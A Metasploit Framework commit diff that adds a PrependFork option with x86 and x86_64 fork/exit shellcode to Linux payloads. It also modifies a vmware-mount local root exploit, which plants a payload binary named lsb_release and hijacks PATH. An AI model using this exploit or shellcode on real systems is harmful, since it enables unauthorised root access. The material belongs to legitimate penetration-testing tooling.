Land #2325, @jlee-r7's Linux PrependFork addition

bug/bundler_fix
jvazquez-r7 2013-09-05 13:50:33 -05:00
commit 206b52ea30
5 changed files with 39 additions and 42 deletions

View File

@ -19,6 +19,13 @@ module Msf::Payload::Linux
register_advanced_options(
[
Msf::OptBool.new('PrependFork',
[
false,
"Prepend a stub that executes: if (fork()) { exit(0); }",
"false"
]
),
Msf::OptBool.new('PrependSetresuid',
[
false,
@ -97,6 +104,17 @@ module Msf::Payload::Linux
# Prepend
if (datastore['PrependFork'])
pre << "\x6a\x02" +# pushb $0x2 #
"\x58" +# popl %eax #
"\xcd\x80" +# int $0x80 ; fork #
"\x85\xc0" +# test %eax,%eax #
"\x74\x06" +# jz 0xf #
"\x31\xc0" +# xor %eax,%eax #
"\xb0\x01" +# movb $0x1,%al ; exit #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetresuid'])
# setresuid(0, 0, 0)
pre << "\x31\xc9" +# xorl %ecx,%ecx #
@ -197,10 +215,8 @@ module Msf::Payload::Linux
"\xcd\x80" # int $0x80 #
end
end
# Handle all Power/CBEA code here
if (test_arch.include?([ ARCH_PPC, ARCH_PPC64, ARCH_CBEA, ARCH_CBEA64 ]))
elsif (test_arch.include?([ ARCH_PPC, ARCH_PPC64, ARCH_CBEA, ARCH_CBEA64 ]))
# Prepend
@ -277,9 +293,21 @@ module Msf::Payload::Linux
"\x38\x1f\xfe\x02" +# addi r0,r31,-510 #
"\x44\xff\xff\x02" # sc #
end
end
if (test_arch.include?(ARCH_X86_64))
elsif (test_arch.include?(ARCH_X86_64))
if (datastore['PrependFork'])
# if (fork()) { exit(0); }
pre << "\x6a\x39" # push 57 ; __NR_fork #
pre << "\x58" # pop rax #
pre << "\x0f\x05" # syscall #
pre << "\x48\x85\xc0" # test rax,rax #
pre << "\x74\x08" # jz 0x08 #
pre << "\x48\x31\xff" # xor rdi,rdi #
pre << "\x6a\x3c" # push 60 ; __NR_exit #
pre << "\x58" # pop rax #
pre << "\x0f\x05" # syscall #
end
if (datastore['PrependSetresuid'])
# setresuid(0, 0, 0)
@ -389,8 +417,8 @@ module Msf::Payload::Linux
# Append exit(0)
if (datastore['AppendExit'])
app << "\x48\x31\xff" # xor rdi,rdi #
pre << "\x6a\x3c" # push 0x53 #
pre << "\x58" # pop rax #
app << "\x6a\x3c" # push 0x3c #
app << "\x58" # pop rax #
app << "\x0f\x05" # syscall #
end
end

View File

@ -43,6 +43,7 @@ class Metasploit4 < Msf::Exploit::Local
'DefaultOptions' => {
"PrependSetresuid" => true,
"PrependSetresgid" => true,
"PrependFork" => true,
},
'Privileged' => true,
'DefaultTarget' => 0,
@ -56,8 +57,6 @@ class Metasploit4 < Msf::Exploit::Local
'DisclosureDate' => "Aug 22 2013"
}
))
# Handled by ghetto hardcoding below.
deregister_options("PrependFork")
end
def check
@ -73,22 +72,7 @@ class Metasploit4 < Msf::Exploit::Local
fail_with(Failure::NotVulnerable, "vmware-mount doesn't exist or is not setuid")
end
# Ghetto PrependFork action which is apparently only implemented for
# Meterpreter.
# XXX Put this in a mixin somewhere
# if(fork()) exit(0);
# 6A02 push byte +0x2
# 58 pop eax
# CD80 int 0x80 ; fork
# 85C0 test eax,eax
# 7406 jz 0xf
# 31C0 xor eax,eax
# B001 mov al,0x1
# CD80 int 0x80 ; exit
exe = generate_payload_exe(
:code => "\x6a\x02\x58\xcd\x80\x85\xc0\x74\x06\x31\xc0\xb0\x01\xcd\x80" + payload.encoded
)
write_file("lsb_release", exe)
write_file("lsb_release", generate_payload_exe)
cmd_exec("chmod +x lsb_release")
cmd_exec("PATH=.:$PATH /usr/bin/vmware-mount")

View File

@ -11,6 +11,7 @@ require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'
module Metasploit3
include Msf::Payload::Linux
include Msf::Sessions::CommandShellOptions
def initialize(info = {})

View File

@ -24,7 +24,6 @@ module Metasploit3
'Session' => Msf::Sessions::Meterpreter_x86_Linux))
register_options([
OptBool.new('PrependFork', [ false, "Add a fork() / exit_group() (for parent) code" ]),
OptInt.new('DebugOptions', [ false, "Debugging options for POSIX meterpreter", 0 ])
], self.class)
end
@ -71,21 +70,6 @@ module Metasploit3
midstager = "\x81\xc4\x54\xf2\xff\xff" # fix up esp
if(datastore['PrependFork'])
# fork() / parent does exit()
# If the target process is threaded, this means the thread
# will exit. exit_group() will try to close the process down
# completely.. and if we do that, it may not be reaped
# correctly.
#
# Plus, depending on the vuln, we might get multiple shots at
# owning a finite amount of threads.
midstager <<
"\x6a\x02\x58\xcd\x80\x85\xc0\x74\x06\x31\xc0\xb0\x01\xcd\x80"
end
midstager <<
"\x6a\x04\x5a\x89\xe1\x89\xfb\x6a\x03\x58" +
"\xcd\x80\x57\xb8\xc0\x00\x00\x00\xbb\x00\x00\x04\x20\x8b\x4c\x24" +

View File

@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'
module Metasploit3
include Msf::Payload::Linux
include Msf::Sessions::CommandShellOptions
def initialize(info = {})